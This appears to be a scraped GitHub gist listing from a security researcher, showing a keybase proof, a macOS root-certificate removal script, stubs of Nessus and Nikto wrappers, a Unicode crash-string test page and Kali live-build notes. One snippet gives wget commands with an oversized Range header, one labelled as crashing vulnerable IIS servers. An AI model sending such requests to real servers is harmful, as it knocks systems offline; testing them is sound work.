I hereby claim:
- I am jgamblin on github.
- I am jgamblin (https://keybase.io/jgamblin) on keybase.
- I have a public key whose fingerprint is 7FA0 DD59 A306 1072 E08C 814D C8CD 66A3 EFCE A51D
To claim this, I am signing this object:
#!/bin/bash | |
# Deletes CNNIC Root Certs from OSX 10.10.3 | |
# WARNING: DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING (BECAUSE I DONT) | |
# IT WILL PROBABLY INSTALL WINDOWS 98 ON YOUR MAC. | |
function remove { | |
echo "Removing ${1}" | |
sudo security delete-certificate -t -Z $2 /System/Library/Keychains/SystemRootCertificates.keychain | |
} |
#Use this just to test (Requested Range Not Satisfiable = vulnerable): | |
wget --header="Range: bytes=0-18446744073709551615" http://serveraddress/iis-85.png | |
#Use this to BSOD Vulnerable systems: | |
wget --header="Range: bytes=18-18446744073709551615" http://serveraddress/iis-85.png |
#!/usr/bin/env python | |
# Name: cloudscan.py | |
# Purpose: Run Nessus Cloud Scans Easily. | |
# By: Jerry Gamblin | |
# Date: 11.05.15 | |
# Modified 11.05.15 | |
# Rev Level 0.5 | |
# ----------------------------------------------- | |
import requests |
#!/usr/bin/env python | |
# Name: niktome.py | |
# Purpose: Run Nikto From My Cloud. | |
# By: Jerry Gamblin | |
# Date: 15.05.15 | |
# Modified 15.05.15 | |
# Rev Level 0.5 | |
# ----------------------------------------------- | |
#!/usr/bin/env python | |
# Name: grepips | |
# Purpose: #!/usr/bin/env python | |
# Name: grepips | |
# Purpose: grep a subnet and report if text is found. | |
# By: Jerry Gamblin | |
# Date: 20.05.15 | |
# Modified 20.05.15 | |
# Rev Level 0.1 | |
## ----------------------------------------------- |
<!DOCTYPE html> | |
<html> | |
<body> | |
<head> | |
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" > | |
<TITLE>effective. Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗</TITLE> | |
</head> | |
<p>Evil Unicode Wont Allow Popup:</p> |
#!/usr/bin/env python | |
# Name: compare.py | |
# Purpose: Compare File Informaation | |
# By: Jerry Gamblin | |
# Date: 18.07.15 | |
# Modified 18.07.15 | |
# Rev Level 0.1 | |
# ----------------------------------------------- |
I hereby claim:
To claim this, I am signing this object:
################################################################## | |
Install live-build | |
################################################################## | |
sudo apt-get isntall live-build | |
################################################################## | |
Git clone the live-build configs | |
################################################################## | |
git clone git://git.kali.org/live-build-config.git |
################################################################## | |
Install live-build | |
################################################################## | |
sudo apt-get install live-build | |
################################################################## | |
Git clone the live-build configs | |
################################################################## | |
git clone git://git.kali.org/live-build-config.git |